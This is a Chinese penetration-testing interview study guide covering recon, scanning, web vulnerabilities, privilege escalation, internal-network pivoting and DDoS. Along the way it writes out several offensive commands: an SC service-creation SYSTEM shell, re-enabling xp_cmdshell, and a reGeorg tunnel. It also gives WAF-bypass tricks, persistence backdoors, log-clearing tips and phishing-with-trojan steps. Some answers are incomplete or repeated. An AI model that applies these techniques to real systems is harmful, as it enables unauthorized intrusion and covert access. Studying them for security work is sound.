一、MSF、Burp
1. burpsuite 常用的功能是哪几个
- 仪表盘(Dashboard)
- 漏洞扫描(Target)
- 代理(Proxy)
- 测试器(Intruder)
- 重发器(Repeater)
- 定序器(Sequencer)
- 编码器 (Decoder)
- 对比器(Comparer)
- Logger
- 插件扩展(Extender)
- 项目选项(Project options)
- 用户选项(User options)
- 其他用户增加的插件
2. reverse_tcp 和 bind_tcp 的区别
(1)reverse_tcp
木马会主动连接目标服务器
(2)bind_tcp
木马会监听本地的端口
二、信息收集
1. 拿到一个待检测的站或给你一个网站,你觉得应该先做什么?
第一步:资产收集
1. 域名收集
- 相关域名
1.1 备案号查询
通过查询域名的备案信息,获取域名whois的信息,包括注册人,姓名电话邮箱等
http://icp.bugscaner.com/
https://icp.aizhan.com
1.2 ssl证书获取相关域名
https://myssl.com/ - 子域名
通过工具OneForAll
https://github.com/shmilylty/OneForAll
通过工具teemo
https://github.com/bit4woo/teemo
灯塔资产管理系统
https://github.com/TophantTechnology/ARL
子域名探测方法:
DNS域传送漏洞
搜索引擎搜索
app破壳提取,抓包提取
公众号抓包提取
公开的DNS源
暴力枚举
2. ip收集
先判断是否存在cdn
超级ping (如果有cdn很可能是cdn地址,偏远国家的ping出来的更可能是真实ip)
搜索引擎搜索域名
3. 资产管理
当前灯塔没有导入功能,这里也可以看到,自动收集和收集的资产的管理,对挖洞和面试都是大有益处(这里后面重点开发下)
第二步 漏洞扫描,敏感信息收集
知识点:
1、打点-Web架构-语言&中间件&数据库&系统等
2、打点-Web源码-CMS开源&闭源售卖&自主研发等
3、打点-Web源码获取-泄露安全&资源监控&其他等
4、打点-Web域名-子域名&相似域名&反查域名&旁注等
信息点:
基础信息,系统信息,应用信息,防护信息,人员信息,其他信息等
技术点:
CMS识别,端口扫描,CDN绕过,源码获取,子域名查询,WAF识别,负载均衡识别等
1.先识别waf (wafw00f)
https://github.com/EnableSecurity/wafw00f
2.扫描器通扫一遍
1)用 AWVS、APPSCAN、长亭科技的 Xray 等扫描器检测 Web 漏洞,如 XSS,XSRF,sql 注
入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含, 远程命令
执行,弱口令,上传,编辑器漏洞,暴力破解等
2)用 namp、天镜、Nessus、极光等扫描系统 ip,对扫描出来的高危漏洞进行测试,如 ms08-
067、ms17-010、ms12-020、ms15-035、ms19-0708、永恒之蓝 2 代、cve-2017-7494(samba)、
cve-2014-6271(破壳)、php cgi 等相关漏洞验证。
3.获取端口号,操作系统,如果有waf,要加延时甚至上快代理(https://www.kuaidaili.com/pricing/#tps)
nmap 扫描
引擎搜索
4.中间件,cms指纹信息
http://whatweb.bugscaner.com/look/
https://cnmmm.com
https://www.yunsee.cn
https://w.ddosi.workers.dev
http://whatweb.bugscaner.com
https://github.com/Lucifer1993/cmsprint
https://github.com/M4tir/Github-Monitor
https://websec.readthedocs.io/zh/latest/language/index.html
Wappalyzer
5.目录爆破,目录爬取
目录遍历中还要关注是否可以获取到敏感文件,代码备份文件等
敏感信息收集,如 github 源码、用 7kb、破壳扫源代码泄露(.hg、.git、cvs、svn、.DS_store
源代码泄露)、google hack、接口信息泄露、社工信息泄露、邮箱地址信息收集、网盘搜索、钟
馗之眼、天眼查、威胁情报、微步在线等
第四步
- 漏洞利用
- 权限提升
- 权限维持
- 清理痕迹
操作系统、中间件、数据库等日志进行清除 - 总结报告及修复方案
2. 漏洞平台,src平台
漏洞平台:
国家信息安全漏洞共享平台
https://www.cnvd.org.cn/
https://www.seebug.org/
漏洞平台
https://www.exploit-db.com/
包风暴
https://packetstormsecurity.com/
绿盟的博客
http://blog.nsfocus.net/category/threat-alert/
乌云漏洞平台
http://wy.zone.ci/
src平台:
国家信息安全漏洞共享平台
https://www.cnvd.org.cn/
教育系统漏洞平台
https://src.sjtu.edu.cn/
补天
https://www.butian.net/Reward/plan/2
漏洞盒子
https://www.vulbox.com/projects/list
漏洞银行
https://www.bugbank.cn/
各大公司的应急响应中心
安全学习平台:
https://www.freebuf.com/
https://www.52pojie.cn/
https://bbs.pediy.com/
一个国外的论坛
https://pentesterlab.com/
https://xz.aliyun.com/node/23
安全脉搏
https://www.secpulse.com/
安全牛
2.1 判断出网站的 CMS 对渗透有什么意义?
- 利用已知漏洞
- 开源项目,进行代码审计
2.2 一个成熟并且相对安全的 CMS,渗透时扫目录的意义?
敏感文件、二级目录扫描,站长的误操作等,比如:网站备份的
压缩文件、说明.txt、二级目录可能存放着其他站点。
2.3 常见的网站服务器(中间件)
IS、Apache、nginx、Lighttpd、Tomcat、Weblogic、Jboss
2.4 如何手工快速判断目标站是 windows 还是 linux 服务器?
第一种方法:linux 大小写敏感,windows 大小写不敏感。
第二种方法:通过 ping 的 TTL 值进行判断,如:
linux 系统的 TTL 值为 64 或 255,
Windows NT/2000/XP 系统的 TTL 值为 128,
Windows 98 系统的 TTL 值为 32,
UNIX 主机的 TTL 值为 255。
2.5 甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录
下存在编辑器和 admin 目录。请问你的想法是?
直接用 7KB 或破壳挂字典在网站二级目录/abc/下扫描敏感文件及目
录。
2.6 SVN/GIT 源代码泄露
(1)在使用 SVN 管理本地代码过程中,会自动生成一个名为.svn 的隐藏文
件夹,其中包含重要的源代码信息
/.git/config
(2)使用 git 进行版本控制,对站点自动部署。如果配置不当,可能会
将.git 文件夹直接部署到线上环境。这就引起了 git 泄露漏洞
/.svn/entries
2.7 在渗透过程中,收集目标站注册人邮箱对我们有什么价值?
- 丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后
台。 - 用邮箱做关键词进行丢进搜索引擎。
- 利用搜索到的关联信息找出其他邮进而得到常用社交账号。
- 社工找出社交账号,里面或许会找出管理员设置密码的习惯 。
- 利用已有信息生成专用字典。
- 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西。
三、 漏洞扫描
1.能否说一下 Web 与系统扫描器优点缺点
2. 漏洞扫描器的强弱主要在那些方面
爬行能力、误报率、漏洞库、执行时间
3. 在项目上,漏洞扫描需要注意那些事项
跟客户确认是否充许登录扫描、扫描并发连接数及线程数、是否
充许暴力破解,什么时间扫描、通知客户备份一下数据,开启业务系
统及网站运维监控,以免断机可及时恢复。
4 Nmap 主要功能有那些,
1、端口扫描,端口探针
#nmap 指定端口
nmap -p80,22,23 192.168.9.84
nmap -p1-100 192.168.9.84
# 指定协议探测端口
nmap -p T:25,U:53 192.168.9.84
#指定协议名来扫描端口
nmap -p smtp destination
# 指定协议名称范围扫描
nmap -p s* dest
# 扫描注册在nmap中的端口
nmap -p [1-65535] dest
2、 主机发现
# 局域网主机发现
ping扫描
nmap -sP CIDR
禁止ping扫描
nmap -sn CIDR
nmap -sn CIDR -oX test.xml
nmap -sn CIDR -oN test.txt
3、操作系统探测(root权限)
nmap -O
4、版本侦测(–sV)
# NSE(Nmap Script Engine) Nmap脚本引擎
nmap --script http-title
# 使用Nmap中漏洞分类脚本对目标进行探测
nmap -sV --script vuln
#-A 万能扫描
#-v 显示详情
#-T4 -T<0-5>:设置计时模板(越高速度越快)
nmap -A -v -T4 ip地址
#sC Nmap脚本进行探测,
#sV表示探测目标机器上的服务信息
#o表示探测目标机器的操作系统信息
nmap -sC -sV -O 192.168.9.84
# 扫描前不进行Ping扫描测试
nmap -Pn
1.7 文件包含漏洞
1.7.1 本地包含与远程包含的区别?
本地包含只需找个上传点,把图片木马上传到对方服务器,通过本地包含漏洞直接包
含木马脚本木马就可以运行 webshell,远程包含需要服务器 php 关闭魔术符号与开启远程包
含功能才行。
1.8 远程命令执行与反序列化
1.8.1 代码执行,文件读取,命令执行的函数都有哪些?
1)代码执行:eval,pregreplace+/e,assert,calluserfunc,calluserfuncarray,create_function
2)文件读取:filegetcontents(),highlight_file(),fopen(),read
file(),fread(),fgetss(), fgets(),parseinifile(),show_source(),file()等
3)命令执行:system(), exec(), shellexec(), passthru() ,pcntlexec(), popen(),proc_open()
1.8.2 struts2 框架漏洞原理
答:
(1)struts 是 java 的 web 框架
(2)采取 OGNL 表达式,处理 view 层数据字符串到 controller 层转换成 java
对象
(3)重点关注的编号加粗如下
S2-057 影响范围非常小
S2-048 影响范围非常小
S2-046 和 S2-045 一样
S2-045 影响范围较大—-通过 Content-Type 这个 header 头,进而执行
命令,通过 Strus2 对错误消息处理进行回显
S2-037 影响范围小
S2-032 影响范围小
S2-020 影响范围小
S2-019 影响范围一般
S2-016 影响范围非常大
S2-013 S2-016 范围内
S2-009 S2-016 范围内
S2-005 S2-016 范围内
1.8.3 JAVA 反序列化原理
答:
(1)Java 序列化指 Java 对象转换为字节序列的过程
(2)Java 反序列化指字节序列恢复为 Java 对象的过程
(3) Commons-collections 爆出第一个漏洞开始,Java 反序列化漏洞的
事件就层出不穷。
(4)在 Java 中,利用 ObjectInputStream 的 readObject 方法进行对象读取
(5)可以深入了解 ysoserial 有哪些 gadgets
1.9 越权访问、未授权访问与逻辑漏洞
1.9.1 某服务器有站点 A,B 为何在 A 的后台添加 test 用户,访问 B 的后台。
发现也添加上了 test 用户?
后端是同一台数据库
1.9.2 目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存
在”,你觉得这里怎样利用?
先爆破用户名,再利用被爆破出来的用户名爆破密码。其实有些站点,在登陆处也会这样
提示,所有和数据库有交互的地方都有可能有注入。
1.9.3 说出至少三种业务逻辑漏洞,以及修复方式?
密码找回漏洞中存在
1) 密码允许暴力破解、
2)存在通用型找回凭证、
3)可以跳过验证步骤、
4)找回凭证可以拦包获取
等方式来通过厂商提供的密码找回功能来得到密码。 身份认证漏洞中最常见的有:
1)会话固定攻击
2) Cookie 仿冒
只要得到 Session 或 Cookie 即可伪造用户身份。
2) 验证码漏洞中存在
1)验证码允许暴力破解 2)验证码可以通过 Javascript 或者改包的方法来进行绕过
1.9.4 目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存
在”,你觉得这里怎样利用?
先爆破用户名,再利用被爆破
1.9.5 redis 未授权访问(redis 写 webshell) 第一步:通过 kail redis-cli 连接,如图:
第二步:写入 webshell
利用条件:
1、在攻击机上能用 redis-cli 连上; 2、开了 web 服务器,并且知道路径(如利用
phpinfo,或者错误爆路经),3、还需要具有文件读写增删改查权限。
依次执行命令如下:
第三步:写入 webshell 时需要使用换行,因为 redis 写入文件的时候会自带一些版
本信息,不换行可能会导致无法执行。
1.10 暴力破解及验证码安全
1.10.1 要发现验证码的问题,你会从那些角度去找,实际工作过程中发现过那
些验证码的问题
客户端、服务端、弱验证码等三个角度去绕过,还有一些特殊的,如验证
码在 Cookies 里面、固定验证码、在网页返回数据包里面等等。
1.11旁注、目录越权、跨库、CDN 绕过
1.11.1 渗透过程中如何找到 Waf、CDN 真实 IP
直接看上面 CDN 绕过方法
1.12社工与 APT
1.12.1 说说你渗透测试是如何社工的? 1、首先信息收集对方企业敏感信息,如公司邮箱、微信、QQ 号、域名、ip、域名注册电话、公司员工信息等;
2、其次提前准备好免杀木马;
3、其次社工库查询公司以前泄露出来的帐号和密码或发送钓鱼邮件,邮件内容及地址伪造跟渗透企业域名相似进行钓
鱼,附件可带 word 木马、图片木马(采用编码伪造扩展名)、exe 软件采用软件困绑器绑好后门等;
4、最后等待木马上线。
1.12.2 你用过 APT 攻击软件吗,对这些软件熟吗?
答:用过,如 Cobalt strike,主要功能有:强大木马生成(可生成各类语言木马方便免杀)、后门(HTML、 office、usb/cd 后门等)、钓鱼攻击、邮件钓鱼、信息收集、内网渗透(socks)、主机提权、扩展(K8 Ladon
内网渗透等)
1.13源代码审计与安全开发生命周期
1.13.1 代码安全测试方法
代码审核采用人工审核和静态分析工具辅助的方式进行。
人工审核:既能解决内部问题也能解决外部问题。这也是目前最有效率的解决方
案,并且在理论上手工代码审核是非常有效的,但人工审核的效率不高,所以我们会
采用自动化分析工具辅助人工的方式来提高审核效率。
静态分析工具:通过一组全面规则、测试机制和方针在软件开发过程、测试中发
现软件的安全缺陷。
1.13.2 说说你是如何做代码审计的
一般我是采用人工审核和静态分析工具辅助的方式进行。
手工代码审计流程:
1、通读全文代码,从功能函数代码开始阅读,例如 include 文件夹下的
common_fun.php,或者有类似关键字的文件。一般我是直接通过 x_search 查涵数快速
找漏洞,如
sql 注入关键字: select、insert、update、_POST、_FILES 、move_uploaded_file
执行漏洞关键字: shell_exec、exec、passthru system、popen
包含漏洞关键字: include、include_once、require、require_once
变量覆盖关键字: $$
跨站漏洞关键字: echo、print、print_r、var_dump、var_exprot,insert
2、看配置文件,带有 config 关键字的文件,找到 mysql.class.php 文件的 connect()
函数,查看在数据库连接时是否出现漏洞。
3、继续跟读首页文件 index.php,了解程序运作时调用了哪些函数和文件 以
index.php 文件作为标线,一层一层去扩展阅读所包含的文件,了解其功能,之后进入
其功能文件夹的首页文件,进行扩展阅读。
工具的话直接采用 HP_Fortify 静态分析工具直接导入源代码进行分析就可以。
1.13.3 描述一下代码审计工具的缺陷
工具本身存在一定量的误报或者漏报。
扫描结果需要大量人工确定甄别。
如用多种语言开发的软件,则需单独分析。
使用工具缺乏规范化的编码规范。
不能自动收集常见的代码安全问题。
1.13.4 为什么要实施应用开发生命周期安全管理
1.13.5 目前业界安全开发生命周期有那四大标准
1.13.6 简历描述一下微软 SDL 安全开发生命周期
1.14 WAF 绕过与后门分析
1.14.1 说说 SQL 注入绕过方法
1,关键字可以用%(只限 IIS 系列)。比如 select,可以 sel%e%ct
2,通杀的,内联注释,如 /!select/
3,编码,可两次编码
4,multipart 请求绕过,在 POST 请求中添加一个上传文件,绕过
了绝大多数 WAF
5,参数绕过,复制参数,id=1&id=1
6,组合法 如 and 可以用&&再 URL 编码
7、替换法,如 and 改成&&;=可以用 like 或 in 等
1.15 系统提权与内网渗透
1.15.1 3389 无法连接的几种情况
没开放 3389 端口
端口被修改
防护拦截
处于内网(需进行端口转发)
1.15.2 提权时选择可读写目录,为何尽量不用带空格的目录?
因为 exp 执行多半需要空格界定参数
1.15.3 说一下 Windows 操作系统是如何提权的?
第一种方法:系统漏洞提权
1、通过 Webshell 命令行执行 systeminfo 命令查看系统是否打了提权补丁,未打补丁的系
统可通过 github 下载系统提权漏洞 exp 进行提权,如 KB2592799、KB3000061、KB2592799
等。
2、通过 Webshell 找网站读写执行目录,把 cs 马或提权 exp 上传到对方服务器(如果 cmd
无法执行命令可单独上传 cmd.exe 到对方服务器,菜刀终端设置为 setp
c:\XXX\cmd.exe) 第三步:
第二种方法:sc 命令提权(administrator–>system)
例如:sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start systcmd,就得到了一个 system 权限的 cmd 环境
第三种方法:不带引号的服务路径
当服务路径带空格的时候,路径空格目录前面一断就会当作文件执行,如 C:\Program
Files\MSBuild 这个目录,攻击者只要在 c 盘创建名为 Program.exe 的木马,最后只要系
统重启就会执行 C:\Program.exe 文件。
第四种方法:不安全的服务权限提升
即使正确引用了服务路径,也可能存在其他漏洞。由于管理配置错误,用户可能对服务
拥有过多的权限,例如,我们用木马替换服务调用的默认文件。
第五种方法:绕过系统 UAC 提升
可通过 msf 里面的 getsystem 绕过 UAC,也可以通过 kail 模块的
exploit/windows/local/bypassuac_injection、exploit/windows/local/bypassuac_vbs
、exploit/windows/local/ask 绕过 UAC
1.15.4 说一下 Linux 系统提权方法? 1、 首先通过 uname –a 查看 linux 版本号,根据 linux 版本号到 kail 里面通过
searchsploit linux XX 系统 版本号找出对应的 exp 进行提权或根据版本号到 github
上面下载对应的 exp 编译运行提权。
2、通过通杀 linux 的方法测试一下脏牛提权
3、直接 suid 提权,先通过以下三行命令找出具有本地查找符合条件具备 root 权限的 suid 文件,如:/usr/bin/find examples.desktop -exec whoami ;
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ; 4、通过漏洞 sudo 提权
1.15.5 描述一下 mysql 数据库提权方法? 1、 通过 UDF 提权;2、通过 mof 提权;3、通过数据库语句写入启动项提权
1.15.6 udf 提权有什么限制条件? (1)MySQL 数据库没有开启安全模式(确认 secure_file_priv = ''是否为空)。 (2)已知的数据库账号具有对 MySQL 数据库 insert 和 delete 的权限,最好是 root 最高权
限。
(3)shell 有写入到数据库安装目录的权限。
1.15.7 描述一下第三方应用软件提权方法? 1、Serv-u 安全性测试(分为有配置文件有修改权限与 servUDaemon.exe 默认管理员帐号
和密码没修改进行提权)
2、FlashFXP 安全性测试(攻击者只需通过 webshell 下载 quick.dat、sites.dat、
stats.dat 这三个文件进行本
地替换,就可以用星号查看器直接查看连接密码)
3、Gene6 FTP 安全性测试(Gene6 FTP 默认安装路径是 C:\Program Files\Gene6 FTP
Server\RemoteAdmin\Remote.ini 其中 Remote.ini 是主配置文件,管理员登录的 ip、端口
和密码都存储在这。但 Gene
6 管理员帐号只充许本地登录。 对于渗透测试人员来讲只需要通过 Webshell 转发端口就
可以进行远程连接)
4、PcanyWhere 安全性测试(找到 pcanywhere 安装目录下面的*.CIF 直接用工具破解密码
就行)
5、VNC 安全性测试(通过脚本大马读取 VNC 连接密码:
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password) 6、Radmin 安全性测试(导出注册表 hash,用 Radmin 的 hash 版连接就行)
7、Zend 安全性测试(攻击者只需要通过 webshell 对原 ZendExtensionManager.dll 重命
名,并通过工具重新生成一个来木马 ZendExtensionManager.dll 让 apche 重启加载。服务
器就会被控制)
8、启动项安全性测试
9、服务替换安全性测试
10、Dll 劫持安全性测试(直接用 Tools lpk sethc v4.0 生成 dll 马通过 webshell 上传
到杀毒软件,输入法等管理员常运行 exe 软件目录,等着 dll 劫持)
11、Perl 安全性测试(低版本可以直接执行系统命令)
1.15.8 说说你是如何做内网渗透的?
第一种方法:在具备 Webshell 的情况下,通过 Webshell 直接上传 CS 木马到对方服务器运
行,在 CS 软件上面开启 SocksProxy 代理,把 kail 直接通过 cs socksProxy 代理攻击内网
进行横向渗透。
第二种方法:通过 reGeorg+Proxifier 进行内网渗透,把 tunnel.nosocket.php 脚本通过
Webshell 上传到 Web 站点目录进行访问,在本地自己电脑上面执行 reGeorgSocksProxy.py
-p 9999 –u http://IP 地址/tunnel.nosocket.php,最后配置 Proxifier 本地代理地址与
端口进行横向内网渗透。
内网横向渗透一般攻击技巧有:
1、通过 nmap、nessus 扫描整个内网 ip 主机漏洞,如如 ms08-067、ms17-010、ms12-020、
ms15-035、ms19-0708、永恒之蓝 2 代、cve-2017-7494(samba)、cve-2014-6271(破壳)、php
cgi 等相关漏洞。
2、通过 nmap 扫内网 80、8080 端口,看内网是否存在大量 Web 站点,如果存在进行手工或
工具对 Web 站点进行漏洞检测,如注入、命令执行、反序列化、文件上传、弱口令等相关漏
洞。
3、通过 ntscan、Bruter、hydra 工具对内网弱口令探测,如果发现一个服务器弱口令,可
以通过这个弱口令跑整个内网,一般密码一样。
4、适当的对内网主机进行 ARP 抓取密码。
5、如果内网有 AD 域的情况下,可以通过 MS14-068 漏洞、黄金票据、白银票据进行域控攻
击,拿下域控就等于基本拿下整个内网。
1.15.9 说说你外网到内网渗透你是怎么做的?
首先对企业进行信息收集,收集完成之后进行 Web 及系统漏洞扫描,无漏洞情况,进行
手工挖掘,如:SQL 注入,xss,弱口令,命令执行这些漏洞拿到 webshell,然后提权进行
操作系统提权,通过系统漏洞补丁号进行提权,如:linux 的话利用脏牛,suid 提权、sudo
提权,windows 的话通过补丁号到 github 找利用 poc 提权,数据库通过 UDF、MOF、启动项
提权或者是第三方软件提权,也可以通过系统劫持提权,在经常更新的目录进行劫持,拿到
系统服务器权限之后,如果可以通内网的情况下。用毒液或 Frp 建立反向代理打通内网,用
mimikazt 获取当前账户密码,然后生成密码字典扫其他内网服务器的密码,可以通过 psexec
工具连接内网,也可以搜集信息看内网开通了哪些端口,根据端口漏洞进行内网渗透攻击
1.15.10 xpcmdshell 禁用了有什么方法提权
可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的步骤可参
考:
用查询分析器,依次执行下面的语句,就可以了.
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
就可以顺利的执行 CMDSHELL 了
1.15.11 权限维持的方法
留自启动后门方法很多,大多数都添加到服务,加注册表 加启动项,
windows:
1.替换系统文件类(shift 后门,放大镜后门)
2.修改注册表类
自启动项、屏幕保护程序注册表、用户登陆初始化、登录脚本、映像劫持、
影子账户、AppCertDlls 注册表项、AppInit_DLLs 注册表项、文件关联、用
户登陆初始化、xx.Netsh Helper DLL
3.文件类
自启动文件夹、office Word StartUp 劫持
4.计划任务
schtasks 、WMI、bitsadmin
Linux
1.预加载型动态链接库后门
2.strace 后门
3.SSH 后门
4.SUID 后门
5.inetd 服务后门
6.协议后门
7.vim 后门
8.PAM 后门
9.进程注入
10.Rootkit
11.端口复用
1.15.12 域渗透:内网黄金票据、白银票据的区别和利用方式
答:
(1)白银票据:抓取到了域控服务 hash 的情况下,在客户端以一个普通域
用户的身份生成 TGS 票据,并且是针对于某个机器上的某个服务的,生成的
白银票据,只能访问指定的 target 机器中指定的服务。
黄金票据:直接抓取域控中账号的 hash,来在 client 端生成一个 TGT 票
据,那么该票据是针对所有机器的所有服务。
(2)通过 mimkatz 执行,导出域控中账号的 Hash
1.15.13 UDF 提权原理
答:利用了 root 高权限,创建带有调用 cmd 的函数的 udf.dll 动态链接
库,导出 udf.dll 文件后,我们就可以直接在命令框输入 cmd
1.15.14 Window、Linux 提权方式
答:
windows:
1.systminfo ,根据系统补丁提权
2.第三方服务提权
3.数据库提权
。。。
linux:
1.利用系统内核漏洞进行提权
2.泄漏密码提权
3.sudo 提权
4.SUID 提权
1.15.15 Windows cmd 如何下载文件
答:
1.certutil.exe
2.powershell
3.bitsadmin
4.vbs
5.ftp
1.15.16 隐藏攻击痕迹的方法
答:
1.跳板
2.代理服务器
3.Tor
4.日志
5.清除历史记录
6.粉碎文件
1.16 敏感信息泄露
1.16.1 台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用
户的密码?
审查元素 把密码处的 password 属性改成 text 就明文显示了
1.16.2 审查元素得知网站所使用的防护软件,你觉得怎样做到的?
在敏感操作被拦截,通过界面信息无法具体判断是什么防护的时候,F12 看 HTML 体部
比如护卫神就可以在名称那看到内容。
1.17 获取 Webshell
1.17.1 数据库备份怎么拿 webshell?
上传图片一句话木马,通过后台备份功能,把一句话木马备份成为 xxx.cer 或 xxx.asp;.jpg 文件就可以菜刀连接了。
1.17.2 mysql 怎么拿 webshell
1、 首先满足以下条件
2、其次找出网站物理路径
3、最后通过 union select 把一句话木马写入到指定 Web 站点目录
1.17.3 如何拿一个网站的 webshell(网站拿 shell 方法有哪些思路)?
文件上传漏洞,后台编辑模板,sql 注入写文件,命令执行,代码执行, 一些已经爆
出的 cms 漏洞,比如 dedecms 后台可以直接建立脚本文件,wordpress 上传插件包含脚本
文件 zip 压缩包等
1.18 ARP 与 DDOS 攻防
1.18.1 ARP 协议的工作过程
第一步:首先,每个主机都会有自己的 ARP 缓存区中建立一个 ARP 列表,以表示 IP 地址和
MAC 地址之间的对应关系。
第二步:当源主机要发送数据时,首先检测 ARP 列表中是否对应 IP 地址的目的主机的 MAC
地址,如果有,则直接发送数据。如果没有,就向本网段的所有主机发送 ARP 数据包,内
容:我是 IP 地址、mac 地址,谁是 IP 地址、mac
第三步:当本网络的所有主机收到该 ARP 数据包时,首先检查数据包中的 IP 地址是否是自
己的 IP 地址,如果不是,则忽略该数据包。如果是,则首先从数据包中取出源主机的 IP 和
mac 地址写入到 ARP 列表中,如果以存在,则覆盖,然后将自己的 mac 地址写入 arp 响应
包中,告诉源主机自己是它想要找的 mac 地址。
第四步:源主机收到 ARP 响应包后,将目的主机的 IP 和 mac 地址写入 arp 列表,并利用此
信息发送数据,如果源主机一直没有收到 arp 响应数据包,表示 arp 查询失败。
1.18.2 ARP 欺骗原理
一般情况下,ARP 欺骗并不是使网络无法正常通信,而是通过冒充网关或其他主机使
得到达网关或主机的数据流通过攻击主机进行转发。通过转发流量可以对流量进行控制和
查看,从而控制流量或得到机密信息。ARP 欺骗主机的流程如图 2 所示。
如图 2 所示,当主机 A 和主机 B 之间通信时,如果主机 A 在自己的 ARP 缓存表中没有
找到主机 B 的 MAC 地址时,主机 A 将会向整个局域网中所有计算机发送 ARP 广播,广播
后整个局域网中的计算机都收到了该数据。这时候,主机 C 响应主机 A,说我是主机 B,
我的 MAC 地址是 XX-XX-XX-XX-XX-XX,主机 A 收到地址后就会重新更新自己的缓冲表。当主
机 A 再次与主机 B 通信时,该数据将被转发到攻击主机(主机 C)上,则该数据流会经过
主机 C 转发到主机 B。
1.18.3 ARP 攻击分类
单向 ARP 欺骗与双向 ARP 欺骗
1.18.4 ARP 防御方法
方法一:静态 ARP 绑定
手工绑定/双向绑定
windows 客户机上:
arp -s 10.1.1.254 00-01-2c-a0-e1-09
arp -a 查看 ARP 缓存表
路由器上静态绑定:
Router(config)#arp 10.0.0.95 0013.240a.b219 arpa f0/0
优点:配置简单
缺点:工作量大,维护量大
方法二:ARP 防火墙
自动绑定静态 ARP
主动防御
优点:简单易用
缺点:当开启人数较多时,会增大网络负担
方法三:硬件级 ARP 防御
交换机支持“端口”做动态 ARP 绑定(配合 DHCP 服务器)
或做静态 ARP 绑定
例如:
conf t
ip dhcp snooping
int range f0/1-48
switch(config-range-if)#
1.18.5 什么是 DOS 与 DDOS 攻击
DoS
利用程序漏洞或一对一资源耗尽的 Denial of Service 拒绝服务
DDoS 分布式拒绝服务
一对一的攻击完全拼是 各自的资源,效果差;
多对一的攻击汇聚资源能力,重点在于量大,属于资源耗尽型。
1.18.6 DDOS 攻击方式、目标、后果
1.18.7 DDOS 攻击分类
D 网络
基于巨量的 Flood 耗尽目标网络带宽资源
如:ICMP Flood, UDP Flood
D 协议
攻击协议漏洞发起的拒绝服务攻击
如:Syn Flood、Ping of Death、ARP、DNS、802.11、SSL
D 应用
针对应用软件和操作系统漏洞发起的拒绝服务攻击
大量频繁访问消耗系统资源严重的应用(CC)
通常表现为操作系统运行正常,网络流量不大,但服务停止响应
可以是一击毙命的,也可以是耗尽目标资源的
1.18.8 SYN 攻击原理
1.18.9 SYN 攻击后有什么特证
看网卡状态:每秒大于 1000 以上的接收包。
看连接状态:netstat –na,看到大量 SYN_RECEIVED 状态的连接。
用冰盾 DDoS 监控器查看:SYN>100
被攻击的直接感受:
Ping 主机不通或丢包严重。
即便没有开放端口,CPU 占用很高甚至 100%
用抓包工具抓包发现有大量的 syn,如下图
1.18.10 你是如何分析 DDOS 攻击的
Ping 211.189.31.188
HTTP 抓包分析:Smsniff.exe
HTTPDebug 协议分析
Netstat 命令
Telnet 命令
冰盾 DDoS 攻击监控器
查看网卡接包与发送情况
任务管理器查看进程 CPU 占用和网络带宽占用
1.18.11 DDOS 如何防范
1.19 其它漏洞
1.19.1 owasp 漏洞都有哪些?
SQL 注入防护方法: 2、失效的身份认证和会话管理 3、跨站脚本攻击 XSS 4、直接引
用不安全的对象 5、安全配置错误 6、敏感信息泄露 7、缺少功能级的访问控制 8、跨站
请求伪造 CSRF 9、使用含有已知漏洞的组件 10、未验证的重定向和转发
1.19.2 常见的网站服务器容器
IIS、Apache、nginx、Lighttpd、Tomcat
1.19.3 什么是 fastjson,有哪些漏洞?
答:
(1)Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库 (2)攻击者准备 rmi 服务和 webredis 服务,将 rmi 绝对路径注入到
lookup 方法中,受害者 JNDI 接口会指向攻击者控制 rmi 服务器,JNDI 接
口向攻击者控制 web 服务器远程加载恶意代码,执行构造函数形成 RCE
(3)fastjson 漏洞历史
1.fastjson-1.2.24
(fastjson 接受的 JSON 可以通过艾特 type 字段来指定该 JSON 应当还原成
何种类型的对象,在反序列化的时候方便操作)
2.fastjson-1.248 以下
(checkAutoType 中使用 TypeUtils.getClassFromMapping(typeName)去
获取 class 不为空,从而绕过了黑名单检测)
3.fastjson-1.2.60 以下
(在此版本以下,字符串中包含\x 转义字符时可以造成 dos 漏洞)
1.19.4 docker 远程 api 漏洞原理
答:
(1)docker swarm 是一个将 docker 集群变成单一虚拟的 docker host 工
具,使用标准的 Docker API,能够方便 docker 集群的管理和扩展,该未授
权访问,可以通过 url 操作,执行 docker 命令。
(2)通过 docker client 执行目标服务器容器命令,docker 是以 root 权限
运行的
一、有运行 ssh 服务,/root/.ssh 目录挂载到 container 内,,然后修改
/.ssh/authorized_keys 文件,把自己的 public key 写进去
二、没有运行 ssh 服务,利用挂载写 crontab 定时任务,反弹一个 shell
1.19.5 讲诉一些近期及有代表性的漏洞
Microsoft Exchange .Net 反序列化远程代码执行(CVE-2020-0688)
该漏洞是由于 Exchange 控制面板(ECP)组件中使用了静态密钥
validationKey 和 decryptionKey
Apache Tomcat 文件包含漏洞(CVE-2020-1938)
默认情况下,Tomcat 会开启 AJP 连接器, Tomcat 在 AJP 协议的实现上存
在漏洞,导致攻击者可以通过发送恶意的请求,可以读取或者包含 Web 根目录
下的任意文件,配合文件上传,将导致任意代码执行(RCE)
Weblogic IIOP 反序列化漏洞(CVE-2020-2551)
weblogic 核心组件中 IIOP 协议,通过该协议对存在漏洞的 WebLogic
进行远程代码执行的攻击
Apache Solr 远程代码执行(CVE-2019-12409)
默认配置文件 solr.in.sh,在其配置文件中 ENABLE_REMOTE_JMX_OPTS
字段默认配置不安全.如果使用默认配置,将启用 JMX 监视服务并将对公网监
听 18983 的 RMI 端口,无需任何验证,配合 JMX RMI 远程代码执行
SHIRO-550 反序列化漏洞
shiro 默认使用了 CookieRememberMeManager,其处理 cookie 的流
程是:
